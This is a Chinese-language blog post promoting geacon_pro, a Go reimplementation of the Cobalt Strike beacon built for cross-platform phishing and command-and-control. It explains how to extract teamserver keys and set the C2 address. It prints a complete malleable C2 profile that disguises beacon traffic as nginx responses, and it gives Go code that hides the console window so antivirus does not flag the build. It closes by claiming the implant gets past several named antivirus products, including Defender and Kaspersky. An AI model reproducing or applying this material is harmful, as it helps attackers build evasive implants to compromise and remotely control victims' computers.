开源基于go重写的beacon

请遵守法律法规，文章旨在提高安全软件的应变策略，严禁非法使用。

0x01 项目简介

基于go重写beacon，基于go重写的优势是可编译windows下、linux下、mac下的cs马，方便跨平台钓鱼或上线cs，劣势是编译后的大小约5M多

项目地址：https://github.com/H4de5-7/geacon_pro

0x02 编译过程

需要修改3个地方，一个是cs服务端的公钥私钥，另一个是cs监听器的地址及端口，最后是profile文件

cs服务端的公钥私钥存储于文件.cobaltstrike.beacon_keys，需要编写工具来提取，可参考项目geacon或者使用我编译好的工具BeaconTool.jar

将提取后的公钥私钥替换config.go中的公钥私钥，同时替换config.go中的C2地址

使用作者提供的profile会报错，需做一些修改，修改后如下

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95

# default sleep time is 60s set sleeptime "3000"; https-certificate { set C "KZ"; set CN "foren.zik"; set O "NN Fern Sub"; set OU "NN Fern"; set ST "KZ"; set validity "365"; } # define indicators for an HTTP GET http-get { set uri "/www/handle/doc"; client { #header "Host" "aliyun.com"; # base64 encode session metadata and store it in the Cookie header. metadata { base64url; prepend "SESSIONID="; header "Cookie"; } } server { # server should send output with no changes #header "Content-Type" "application/octet-stream"; header "Server" "nginx/1.10.3 (Ubuntu)"; header "Content-Type" "application/octet-stream"; header "Connection" "keep-alive"; header "Vary" "Accept"; header "Pragma" "public"; header "Expires" "0"; header "Cache-Control" "must-revalidate, post-check=0, pre-check=0"; output { mask; netbios; prepend "data="; append "%%"; print; } } } # define indicators for an HTTP http-post { # Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided] set uri "/IMXo"; client { #header "Content-Type" "application/octet-stream"; # transmit our session identifier as /submit.php?id=[identifier] id { mask; netbiosu; prepend "user="; append "%%"; header "User"; } # post our output with no real changes output { mask; base64url; prepend "data="; append "%%"; print; } } # The server's response to our HTTP POST server { header "Server" "nginx/1.10.3 (Ubuntu)"; header "Content-Type" "application/octet-stream"; header "Connection" "keep-alive"; header "Vary" "Accept"; header "Pragma" "public"; header "Expires" "0"; header "Cache-Control" "must-revalidate, post-check=0, pre-check=0"; # this will just print an empty string, meh... output { mask; netbios; prepend "data="; append "%%"; print; } } }

编译前需要安装缺少的库，go库被墙不能直接访问，需配置中国镜像，或其他方式

0x03 代码修改

任何开源的免杀项目，时间一长都会不再免杀，我们要想它免杀的时间长一些，需要自己改一改代码，作者在readme中提到，windows编译时添加-ldflags “-H windowsgui -s -w”减小程序体积并取消黑框，这个取消黑框的选项通常会被杀软捕获，我们这里改用代码实现取消黑框

1 2 3 4 5 6 7 8 9 10

func HideWindow() { console := w32.GetConsoleWindow() if console == 0 { return // no console attached } _, consoleProcID := w32.GetWindowThreadProcessId(console) if w32.GetCurrentProcessId() == consoleProcID { w32.ShowWindowAsync(console, w32.SW_HIDE) } }

添加如下代码，并在main中调用HideWindow()，然后编译时不需要指定选项-H windowsgui，通读代码后，还可以修改其他部分，可自由发挥

0x04 效果展示

360卫士（核晶）、360杀毒、火绒、腾讯电脑管家

Defender

卡巴斯基免费版

均可上线